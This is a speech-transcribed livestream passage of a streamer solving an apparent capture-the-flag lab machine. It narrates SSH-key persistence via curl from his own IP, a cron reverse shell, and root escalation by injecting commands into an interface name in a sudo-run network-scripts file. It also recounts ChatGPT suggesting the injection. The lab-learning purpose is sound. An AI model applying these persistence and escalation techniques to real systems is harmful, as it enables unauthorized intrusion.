this up. Alright, so we don't need mmap anymore. Screw this. Close out of this. close out of this. Alright, so we want to do a curl dash O ID RSA. No, wait, I need to move a private key. No, public key. Yeah, public key. ID RSA dot pub, and it's going to be 10.10.16.31 slash ID RSA dot pub. That should work. Okay, so make directory dot ssh, move ID RSA dot pub to dot ssh. Cat ID RSA dot pub. What? Cat ID RSA dot pub. And we will copy this. And then we will do echo this into AUTHORIZED keys. Cat authorized keys. Okay, cool. I should be able to SSH in as Gurley now. SSH dash I ID .sh slash ID RSA as Gurley, not Gurley, Ghoulie at where the IP address is for this machine, which is this. That should work. Yes. Should ask me for my key password. Maybe. Says SSH is slow. Should ask me for, yeah, a password for the key. Ghoulie password. Why is it asking for Ghoulie's password? Oh, I know why. It's because we need to change the permissions on smod on SSH smod plus no smod 600. Oh no, it's 700 for this one. 700 dot sh. Okay, cool. And then see if that works. Well, I guess authorized keys has to be 600. Change directory authorized key, no. Change directory .ssh mod 600 authorized keys. Alright, well that didn't work. Okay, so let's try this again, because authorized key is supposed to be 600 and SSH is supposed to be 700, which is what we have. So this should work. Passphrase for my key. Hey, we're in there. All right, good. I got persistence now. All right, sudo -l. We can run change name.sh. Let's see if the DTF opens for this. Change name seems like. Alright, well, can I cat this out? What does this do? I can run change name. Cat and a file. Bin bash -p. So it's running this as root? Maybe? Yeah, maybe. ls-la. Can I write to this? I don't know what this means. What is this EOF getting redirected into this? I can't write to this file, but this is what's getting ran. I can't write this file either. What's up, Mister 3? Thanks for stopping. How you doing today? Oh no, I can't. No wait. I'm gonna execute and read. Oh, I don't have the brain power to do this anymore. I don't know how these. Try sudo file and ID. So you're saying do this? Interface name. Wrong input. Oh, I can write to this? Device GUI 0 does not seem to be present, delaying initialization. I don't know what this means. Try ID now, see if something changed. I'm so gooey. I'm putting LMPs on the machine to see if what LMPs tells us. Maybe the sudo-l is a rabbit hole. Yeah, you might be right. Could be right. Did that work? Clearly not. Why not? Ah, I see. Because I did 32 as IP and not 31. There we go. chmod plus x lenps.sh. Yeah, I don't think it's the right way. Let's check out guided mode real quick. Yeah, see, that's the way. I don't know how to exploit it. I want to feed this all to ChatGPT and see what ChatGPT says. See what ChatGPT says here. we can execute without a password. Okay, constant chain. The script writes. Okay, we know that. It allows for user input. Specify the values of name, proxy, method, browser only. Regular expression restriction. The script restricts input to alphanumeric characters, underscore, spaces, but it does not prevent command injection via embedded spaces or slashes. Since the script runs as root, write user's controller into. You may try to inject a command to the variables that script accepts. Notably, the script uses regular expressions. Okay, you can attempt to insert commands without breaking out of the intended file. You can try. Okay. Run this. For each variable, use an injection attempt like. Let's see if that works. I'm actually surprised ChatGPT gave me the answer to that one. Wrong output, try again. Didn't mean to hit fine. Let's try this again. ChatGPT gave me back. Oh, we got a shell. Look at that. We're still going. It worked though. We're still. Well, hold on. Let's do ID. This is 1,000. That's the. Isn't that the root user?
Access granted.
No, root's 500, right? Carbon Map, thanks for following on Twitch. I appreciate you. That worked, but not as root though. Try Binbash P. Bro, can we talk about how sometimes, like, when you push the up arrow key, it doesn't go to your last command? Like, your last command is just gone? Like, why does it do that sometimes? I hate that. That's annoying, dude. That didn't work either. It ran a command. It says a command not found, though. I am new at Twitch. We'll take a ride to see the valuable channels. And they come back. Have a great time. Alright. Hopefully you come back. Thanks for stopping in. Good luck finding valuable channels. We'll try out the script to see. Just try running bash. Yeah, that's a good idea. Might be overcomplicating it here. Yeah, I keep getting this reverse shell back as goalie because of that cron job. That's what I realized. So you can't write just regular bash. Yeah. We tried bin bash -p. It didn't work. Oops, did not mean to do that. It seemed like it wanted to work, but You're saying try colon HTTP bash? Doesn't work. Bash works. They're like HTTP bash? Like that? How's that gonna do anything? Did that work? How does that work? Why does that work? I don't understand why that works. That's wild. I don't understand why that works. It's a bug in CentOS in this version. Read the link you sent. I don't see a link that you sent. What's up, DeepU? Thanks for stopping in. Am I using a virtual machine? Yeah. That's crazy. It's a bug in Network Manager? How do we know Network Manager? Red Hat Bugzilla? How am I supposed to find that though? How do we know that's gonna work though? I don't understand why there was no indication that this was called Network Manager though. It's just called Network Scripts. It's not network. It doesn't say Network Manager though. SUID position independent executable. Yeah, but GCC's not on the machine though. I bet. Yeah, so I wouldn't have been able to compile this exploit. This exploit would work if I could compile it, but if cfg equals interface command. Right, but how do we know that? I just don't understand how to find this like how to find that that's vulnerable to that. That's what I'm confused by. Like what indicates that? I know we can run the network scripts. But how do I know? That's weird. I don't understand. Let me read a write-up on this. According to this page, we can inject commands in the interface name. Red Hat CentOS through network scripts. Yeah, but how? I just don't understand what would prompt someone to Google this. Because network script just seems like a generic name. Like it doesn't, like if I saw network manager version 2.7, I would be like, all right, let me Google that. But just network scripts, it just seemed like it was kind of like, It just seems like that would be something like any system admin would call network scripts. You know what I mean? I didn't think it would be like a common thing. It seemed like it was like self-written, or like the admin wrote that. Like if you would have told me like, oh yeah, this can exist on like in the wild, I would have been like, I would have had a big doubt. Huh. Alright then, well I guess that's the machine. I don't know. I feel like this is a medium difficult. Like I don't see. I mean, it's easy once you know how to exploit it, like what the vulnerability is. But finding the vulnerability, that's the hard part. Lessons learned, network scripts is a thing. Yeah, I guess. Now I know. Now we know. Why can't I? Oh, I'm already on it. Let's go ahead and shut this down. Alright guys, it's gonna be the stream. We don't have time for another box, unfortunately. This one's actually a short stream because it's in that weird spot where I finished it kind of early, but at the same time, there's not enough time to start a second machine. So we're gonna end the stream there. If you haven't yet already, follow the channel, hit the follow button. If you haven't subscribed to my YouTube channel, hit the subscribe button. If you're watching on YouTube right now, hit the like button. Would do me a huge favor. If you guys listen to the Hackers Cast, which you should, by the way, my podcast, I am allowing users to submit questions, and I'm going to answer your questions on the podcast. That first Q&A episode that I'm going to do on the Hackers Cast podcast is going to launch November 13th, but the recording is going to happen pretty soon. So if you want to ask a question and have it featured on a podcast, you can do it a few different ways. you can go to my Discord server and then go to the Hackers Cache questions, ask your questions there. Or you can email me at kyser@kyserclark.com. And then in the future, you can just drop a comment on the Q&A episodes. But since there's no Q&A episodes yet, you can't put it in the comments because there's no Q&A episodes yet. And then, yeah, next stream will be Thursday, 7 p.m. Eastern time. And then I'll stream this time next week, noon Eastern time. Hope I see you in the next stream. Also, check out my latest video, how to build soft skills in cybersecurity. It's very important. If you haven't seen that yet already, it's a pretty good video. And then I got way more videos on the way, so hopefully I see you in some videos. Thanks for watching. Thanks for hanging out. You guys are awesome. Thanks for support. And thanks for the help for everyone who helped me solve this machine. I appreciate you guys. You guys are a lot smarter than me, I feel like. Most of you anyways. Alright guys, thank you so much. Peace out. Take care. Have a good one. Kyser out.